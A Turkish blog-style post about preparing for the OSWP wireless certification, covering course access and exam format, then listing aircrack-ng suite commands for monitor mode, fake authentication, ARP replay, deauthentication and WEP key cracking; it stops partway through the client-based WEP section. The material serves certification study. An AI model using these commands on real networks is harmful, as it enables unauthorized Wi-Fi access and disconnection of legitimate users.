OSWP ( Offensive Security Wireless Attacks) sertifikasından bahsedelim. , OSWP sertifikasını alabilmek için kendilerinin sunmuş olduğu WiFu eğitimine katılmalıyız. Bu eğitim içinse bizden kurumsal bir mail adresi istiyor. Kurumsal mail ile kayıt yaptıktan sonra bizlere videolu anlatım ve pdf şeklinde OSWP WiFu kitabını gönderiyorlar. Bu gönderilen dosyalar 72 saat için geçerlidir. Eğer 72 saat içinde indirmezseniz expire olacak ve erişiminiz kalmayacaktır. O yüzden gönderilen dosyaları indirin ve yedekleyin... Sınava girebilmek için yaklaşık olarak 6 ay süreniz var.
Gelelim Sınava... Sınav süresi 3 saat 45 dk ve sınav sonrası raporunuzu iletmeniz için 24 saat süre veriyorlar. Sınav ortamına, offsec’in sizinle paylaştığı SSH bilgileri bağlanıyorsunuz. Sınav süreniz geldiğinde size seçtiğiniz saatte ssh yapılacak olan ip-port-k.adı-şifre bilgisi iletiliyor. Sınavda birden fazla terminal kullanmanız gerekecek. Hepsine SSH yapmanız gerekiyor. Bunu unutmayın...
OSWP Çalışma Komutları
Sınavda sizden WEP/WPA/WPA2 cracklenmesini istiyor. Yeni nesil modemlerde WEP bulunmadığı için eski modem kullanacaksınız haberiniz olsun... Şimdi size komutlarımızı yazacağım.
Başlangıç Komutları
ifconfig ve iwconfig yazıp kontrol sağlıyoruz...
rfkill unblock all; airmon-ng > adaptörün bir kilidi varsa bu komutla onu açıyoruz.
airmon-ng check > bu komutla sıkıntı var mı yok mu diye kontrol ediyoruz.
airmon-ng check kill > bu komutla sıkıntıları yani bize engel olabilecek şeyleri kapatıyoruz.
airmon-ng start wlan0 1 > bu komut adaptörümüzü monitor moda çekecek.
airodump-ng wlan0mon > burada ağdaki sinyalleri dinleyerek hedefimizi seçiyoruz.
airmon-ng start wlan0mon --channel > bu komutta cihazımızı istediğimiz bir kanala yerleştiriyoruz 1-13 arası olabilir. O kanaldaki cihazları göstercektir.
1) WEP Cracking
Burada data çekmemiz gerekiyor. Ben genellikle 70.000 datada bırakıyorum. Haberiniz olsun...
Ağda AP yakalayacağız. Arp göndererek te replay ederek IV kasacağız. Burada önemli olan muhattabımız AP ve adaptörümüz...
a) Ağı Dinleme ve Dosyaya Kaydetme
airodump-ng --bssid <apMAC> -c <apChannel> wlan0mon -w <fileName>
b) Fake Auth
aireplay-ng -1 6000 -a <apMAC> wlan0mon > Buradaki 6000 değerini 10'dan başlayarak 10'nar kez arttırın. Bu kaç saniyede bir bağlantı kurmasını belirliyor.
c) Arp Tekrar Etme
aireplay-ng -3 -b <apMAC> wlan0mon > Arp paketini replay etme komutudur...
d) Paket gelmezse Deauth gönderme
aireplay-ng -0 0 -a <apMAC> -c <clientMAC>
e) Şifreyi Crackleme
Yeterli kadar data toplandığında kaydettiğimiz dosyayı burada kullanacağız.
aircrack-ng <fileName> > Örnek : WEP-01.cap
2) WEP (Client)
Burada ağa bağlı olan bir clientten data kasacağız...
a) Ağı Dinleme ve Dosyaya Kaydetme
airodump-ng --bssid <apMAC> -c <apChannel> wlan0mon -w <fileName>
b) Geçen Arpları okuma
aireplay-ng -2 -b <apMAC> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
